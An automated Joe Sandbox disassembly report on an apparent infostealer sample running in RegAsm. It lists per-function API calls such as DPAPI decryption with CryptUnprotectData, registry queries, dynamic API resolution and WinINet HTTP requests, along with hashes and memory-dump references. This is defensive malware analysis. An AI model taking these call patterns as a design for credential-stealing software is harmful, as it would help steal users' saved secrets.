                                                                                                                                                                                                • API ID: CrackH_prologInternetlstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 503950642-0
                                                                                                                                                                                                • Opcode ID: 9a5937afff5c11dea6ffe0ee86a216098c686409a9e8273c2abd2d22ddd4ed6c
                                                                                                                                                                                                • Instruction ID: 383eafd706f4d7733415b73dc21a4906bfce4d5d1e04002f424781588bab2e5d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a5937afff5c11dea6ffe0ee86a216098c686409a9e8273c2abd2d22ddd4ed6c
                                                                                                                                                                                                • Instruction Fuzzy Hash: A8112E71D00208ABDB14EFA5D846BDE7F78AF15324F20822AE561B62D1DB385B45CB54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00406531 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00406536
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00424B9C,?,?,?,00424B97,00000000), ref: 004065F3
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00424BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00424B9B), ref: 0040666B
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 00406686
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004065E7, 004065EC, 00406606
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                • API String ID: 757424748-3463377506
                                                                                                                                                                                                • Opcode ID: 8133bada3c69014e63e9cd7ba50616ce2252662be9c286f1d04de56903218515
                                                                                                                                                                                                • Instruction ID: 0564b445663ea615f9c0a7c2c7601842e054addbc94018be546675762f5092e9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8133bada3c69014e63e9cd7ba50616ce2252662be9c286f1d04de56903218515
                                                                                                                                                                                                • Instruction Fuzzy Hash: 39618070801144EECB15EBA5DA05AEDBB72EF25308F10447EF446732E2DB780A19CF69
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040B20D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040B212
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040FD58: LocalAlloc.KERNEL32(00000040,004120FA,00000001,00000000,?,004120F9,00000000,00000000), ref: 0040FD71
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B265
                                                                                                                                                                                                  • Part of subcall function 0040628E: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062AE
                                                                                                                                                                                                  • Part of subcall function 0040628E: LocalAlloc.KERNEL32(00000040,EY@,?,?,00405945,00000000,?,?), ref: 004062BC
                                                                                                                                                                                                  • Part of subcall function 0040628E: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062D2
                                                                                                                                                                                                  • Part of subcall function 0040628E: LocalFree.KERNEL32(00000000,?,?,00405945,00000000,?,?), ref: 004062E1
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0040B2A3
                                                                                                                                                                                                  • Part of subcall function 004062F1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406314
                                                                                                                                                                                                  • Part of subcall function 004062F1: LocalAlloc.KERNEL32(00000040,?,?), ref: 0040632C
                                                                                                                                                                                                  • Part of subcall function 004062F1: LocalFree.KERNEL32(?), ref: 0040634A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                • String ID: $DPAPI
                                                                                                                                                                                                • API String ID: 2477620391-1819349886
                                                                                                                                                                                                • Opcode ID: 6e8be76a824977e1e50c33ca222f8d372b89b4dd43ac573d80de2e937b3d1833
                                                                                                                                                                                                • Instruction ID: 263fa1929b04d3328671ddb6269ee77dc5295006a5a60b298b8ba209c6a920fe
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e8be76a824977e1e50c33ca222f8d372b89b4dd43ac573d80de2e937b3d1833
                                                                                                                                                                                                • Instruction Fuzzy Hash: A321E1B2D00109ABCF11ABA6CC469EFBB79EF54314F14017BF911B21D1F7399A508AAD
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F698 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory), ref: 0040F6AC
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F6B3
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?), ref: 0040F6E1
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000), ref: 0040F6FD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                • String ID: Windows 11
                                                                                                                                                                                                • API String ID: 3676486918-2517555085
                                                                                                                                                                                                • Opcode ID: 116ea7af916269327c75932af4b0c8a565750c9c475af4e4f38e5e0d42f1927c
                                                                                                                                                                                                • Instruction ID: a4fdafc1f51cc4e636eeb9b2f04a94c517ac282ae5520522daff2f5ac87281dd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 116ea7af916269327c75932af4b0c8a565750c9c475af4e4f38e5e0d42f1927c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F06279640215FBEB209BD1DD0AF6A7A7EEB45B44F101036FB01E61E0D7B49A10DB24
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040EB3F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040EBB1,0040F6C0,?,?,?,00413A47,00000000,?,Windows: ,00000000), ref: 0040EB53
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,0040EBB1,0040F6C0,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C), ref: 0040EB5A
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040EBB1,0040F6C0,?,?,?,00413A47,00000000,?,Windows: ), ref: 0040EB78
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040EBB1,0040F6C0,?,?,?,00413A47,00000000), ref: 0040EB93
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                • String ID: CurrentBuildNumber
                                                                                                                                                                                                • API String ID: 3676486918-1022791448
                                                                                                                                                                                                • Opcode ID: b7a1cadd6af1d37ce2bb42d3d59b767d7a88e45211d7c1549b2bead73dd6883c
                                                                                                                                                                                                • Instruction ID: 5a1b8344219bb76cf6eb49664f8bd172239daab24317a4b126cc0b4746ce801e
                                                                                                                                                                                                • Opcode Fuzzy Hash: b7a1cadd6af1d37ce2bb42d3d59b767d7a88e45211d7c1549b2bead73dd6883c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 66F03075640215FBFB109BD1DC0BF6E7A7DEB45F04F201069F701A5091E6B46A109B24
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004159CB Relevance: 8.1, APIs: 5, Instructions: 614networksleepCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004159D0
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 00412424: _EH_prolog.MSVCRT ref: 00412429
                                                                                                                                                                                                  • Part of subcall function 004121C3: _EH_prolog.MSVCRT ref: 004121C8
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32(74DD0000,00415AF4), ref: 0041668A
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166A1
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166B8
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166CF
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166E6
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166FD
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416714
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041672B
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416742
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416759
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416770
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416787
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041679E
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004167B5
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004167CC
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004167E3
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004167FA
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416811
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416828
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041683F
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416856
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041686D
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416884
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041689B
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,00411C31,?,00425503,00000000,?,00000040,00000064,00412598,00411C31,?,0000002C,00000064), ref: 00415B9D
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0041283A: _EH_prolog.MSVCRT ref: 0041283F
                                                                                                                                                                                                  • Part of subcall function 004124D3: _EH_prolog.MSVCRT ref: 004124D8
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00415C82
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00415C9E
                                                                                                                                                                                                  • Part of subcall function 0040F52A: _EH_prolog.MSVCRT ref: 0040F52F
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040F552
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F584
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F5C7
                                                                                                                                                                                                  • Part of subcall function 0040F52A: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F5CE
                                                                                                                                                                                                  • Part of subcall function 00403B17: _EH_prolog.MSVCRT ref: 00403B1C
                                                                                                                                                                                                  • Part of subcall function 00403B17: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BC7
                                                                                                                                                                                                  • Part of subcall function 00403B17: StrCmpCA.SHLWAPI(?), ref: 00403BDE
                                                                                                                                                                                                  • Part of subcall function 00410BF7: _EH_prolog.MSVCRT ref: 00410BFC
                                                                                                                                                                                                  • Part of subcall function 00410BF7: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00415D19), ref: 00410C1E
                                                                                                                                                                                                  • Part of subcall function 00410BF7: ExitProcess.KERNEL32 ref: 00410C29
                                                                                                                                                                                                  • Part of subcall function 00405183: _EH_prolog.MSVCRT ref: 00405188
                                                                                                                                                                                                  • Part of subcall function 00405183: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405233
                                                                                                                                                                                                  • Part of subcall function 00405183: StrCmpCA.SHLWAPI(?), ref: 0040524A
                                                                                                                                                                                                  • Part of subcall function 004106E3: _EH_prolog.MSVCRT ref: 004106E8
                                                                                                                                                                                                  • Part of subcall function 004106E3: strtok_s.MSVCRT ref: 0041070F
                                                                                                                                                                                                  • Part of subcall function 004106E3: StrCmpCA.SHLWAPI(00000000,004254A8,?,?,?,?,00415EA8), ref: 00410740
                                                                                                                                                                                                  • Part of subcall function 004106E3: strtok_s.MSVCRT ref: 004107A1
                                                                                                                                                                                                  • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                                                                                                                                  • Part of subcall function 00405183: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053D2
                                                                                                                                                                                                  • Part of subcall function 00405183: HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00405409
                                                                                                                                                                                                  • Part of subcall function 00411B93: _EH_prolog.MSVCRT ref: 00411B98
                                                                                                                                                                                                  • Part of subcall function 00411B93: strtok_s.MSVCRT ref: 00411BBF
                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 00416057
                                                                                                                                                                                                  • Part of subcall function 00405183: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040542E
                                                                                                                                                                                                  • Part of subcall function 00411B93: strtok_s.MSVCRT ref: 00411BFF
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$H_prolog$Internetlstrcpy$Open$strtok_s$DirectoryHeapProcesslstrcatlstrlen$AllocConnectCreateExitHttpInformationOptionRequestSleepSystemTimeVolumeWindows
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4125082457-0
                                                                                                                                                                                                • Opcode ID: 738281476d5284411635911381d097a2b9744545c5ef9b347938e2c271a1d684
                                                                                                                                                                                                • Instruction ID: 481a4604d310252fad8a217da08601282fa68929c26b5bc73ce888e1270fc528
                                                                                                                                                                                                • Opcode Fuzzy Hash: 738281476d5284411635911381d097a2b9744545c5ef9b347938e2c271a1d684
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A3241B1D00258EADF10EBA5C946BDDBBB8AF15304F5045AFE44473281DB781B98CBA7
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004024F9 Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00402512
                                                                                                                                                                                                  • Part of subcall function 0040247E: memset.MSVCRT ref: 004024A3
                                                                                                                                                                                                  • Part of subcall function 0040247E: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024C9
                                                                                                                                                                                                  • Part of subcall function 0040247E: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024E3
                                                                                                                                                                                                • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402527
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402532
